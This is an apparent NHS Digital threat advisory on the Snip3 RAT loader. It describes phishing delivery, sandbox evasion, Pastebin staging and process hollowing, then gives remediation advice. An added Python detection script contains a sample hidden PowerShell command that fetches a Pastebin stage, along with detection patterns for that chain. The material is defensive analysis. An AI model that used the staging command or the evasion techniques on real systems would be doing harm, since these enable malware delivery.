Snip3 RAT Loader
Summary
Snip3 is a Crypter-as-a-Service which includes a loader that has been involved in some recent campaigns involving RevengeRAT and AsyncRAT.
Affected platforms
The following platforms are known to be affected:
Threat details
Introduction
First observed in February 2021, Snip3 is a loader and sophisticated Crypter-as-a-Service that delivers several remote access trojans (RATs) onto target machines. Snip3 has recently been linked to RevengeRAT and AsyncRAT, both of which have been used in spear phishing email campaigns.
Delivery
The Snip3 RAT crypter is commonly delivered through phishing emails, but has also been seen distributed inside a large installer file, in one case a decoy Adobe installer. The crypter uses advanced techniques to avoid detection, including checking for the presence of VMware and Windows Sandbox virtualisation, using Pastebin and top4top for staging, and executing PowerShell scripts with the RemoteSigned execution policy. Several variants have been detected; all use a VBScript that decodes a PowerShell script, which then downloads, saves and executes a second-stage PowerShell script.
Activities
Once Snip3 has been deployed, the payload is injected into a running InstallUtil.exe or RegSvcs.exe process using a RunPE (process hollowing) technique that overwrites the process's memory contents. To help evade detection, the RunPE method is embedded as compressed source code and compiled at runtime. Once compiled, PowerShell is used to load and execute the RunPE function along with the RAT payload, so the final payload runs inside the hollowed process's memory.
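The delivery and injection chain described in the two sections above (script host launching PowerShell with the RemoteSigned policy, PowerShell fetching a stage from a paste site, and PowerShell then launching InstallUtil.exe or RegSvcs.exe as a hollowing target) lends itself to a simple process-tree hunt. The following is an added detection example written for this page; it is not NHS Digital tooling and not part of the original advisory. It assumes Sysmon-style process-creation records with the field names `pid`, `ppid`, `image`, `parent_image` and `cmdline` (an assumption about the log schema), and the sample events are constructed for the example rather than real indicators.

```python
"""Hunt for the Snip3 delivery/injection chain in process-creation events.

Added example, not NHS Digital's own tooling. Field names follow a Sysmon
Event ID 1 style but are an assumption about the log schema; the sample
events below are constructed for this example and are not real IoCs.
"""
from __future__ import annotations

import re
from typing import Dict, Iterable, List, Tuple

# Constructed sample telemetry: a VBScript launched from a download, the
# PowerShell it spawns, the hollowing target, and two benign processes.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 1200, "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\invoice.vbs"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "cmdline": "powershell.exe -ExecutionPolicy RemoteSigned -w hidden "
                '-c "iwr https://pastebin.com/raw/PLACEHOLDER"'},
    {"pid": 4210, "ppid": 4188,
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "InstallUtil.exe"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
    # Benign admin automation: RemoteSigned alone is too noisy to alert on.
    {"pid": 5100, "ppid": 2000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Admin\deploy.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\deploy\update.ps1"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Process hollowing targets named in the advisory.
HOLLOWING_TARGETS = {"installutil.exe", "regsvcs.exe"}
# Staging services named in the advisory.
STAGING_HOSTS = re.compile(r"pastebin\.com|top4top", re.IGNORECASE)
# -ExecutionPolicy and its common abbreviations followed by RemoteSigned.
REMOTESIGNED = re.compile(r"-(?:ExecutionPolicy|ep|ex|exec)\s+RemoteSigned", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> List[str]:
    """Return the detection labels that apply to a single event."""
    image = basename(event["image"])
    parent = basename(event["parent_image"])
    cmd = event["cmdline"]
    findings: List[str] = []
    if image in POWERSHELL:
        # RemoteSigned is only interesting when a script host is the parent.
        if parent in SCRIPT_HOSTS and REMOTESIGNED.search(cmd):
            findings.append("script-host-spawned-powershell-remotesigned")
        if STAGING_HOSTS.search(cmd):
            findings.append("powershell-contacts-paste-site")
    if image in HOLLOWING_TARGETS and parent in POWERSHELL:
        findings.append("powershell-spawned-hollowing-target")
    return findings


def scan(events: Iterable[dict]) -> Dict[int, List[str]]:
    """Map pid -> labels for every event that triggers at least one rule."""
    return {e["pid"]: f for e in events if (f := classify(e))}


def chains(events: Iterable[dict]) -> List[Tuple[int, int, int]]:
    """Correlate by ppid: script host -> PowerShell -> hollowing target.

    A full three-process chain is a much stronger signal than any one event.
    """
    events = list(events)
    by_pid = {e["pid"]: e for e in events}
    found = []
    for e in events:
        if basename(e["image"]) not in HOLLOWING_TARGETS:
            continue
        parent = by_pid.get(e["ppid"])
        grand = by_pid.get(parent["ppid"]) if parent else None
        if (parent and basename(parent["image"]) in POWERSHELL
                and grand and basename(grand["image"]) in SCRIPT_HOSTS):
            found.append((grand["pid"], parent["pid"], e["pid"]))
    return found


if __name__ == "__main__":
    for pid, labels in scan(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {', '.join(labels)}")
    for chain in chains(SAMPLE_EVENTS):
        print("Snip3-style chain (script host -> PowerShell -> hollowing target):", chain)
```

The per-event rules deliberately require context (a script-host parent, a paste-site URL, or a PowerShell parent for the .NET utilities) rather than alerting on `RemoteSigned` alone, which legitimate automation uses; the `chains` correlation then ties the three stages together into the higher-confidence finding an analyst would escalate.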
Remediation advice
To prevent and detect an infection, NHS Digital advises that:
- Secure configurations are applied to all devices.
- Security updates are applied at the earliest opportunity.
- Tamper protection settings in security products are enabled where available.
- Obsolete platforms are segregated from the rest of the network.
- IT usage policies are reinforced by regular training to ensure all users know not to open unsolicited links or attachments.
- Multi-factor authentication (MFA) and lockout policies are used where practicable, especially for administrative accounts.
- Administrative accounts are only used for necessary purposes.
- Remote administration services use strongly encrypted protocols and only accept connections from authorised users or locations.
- Systems are continuously monitored, and unusual activity is investigated, so that a compromise of the network can be detected as early as possible.
Please note that NCSC maintains guidance for securely configuring a wide range of end user device (EUD) platforms. For further details refer to their end user device security guidance pages.
Indicators of compromise
Last edited: 20 May 2021 5:19 pm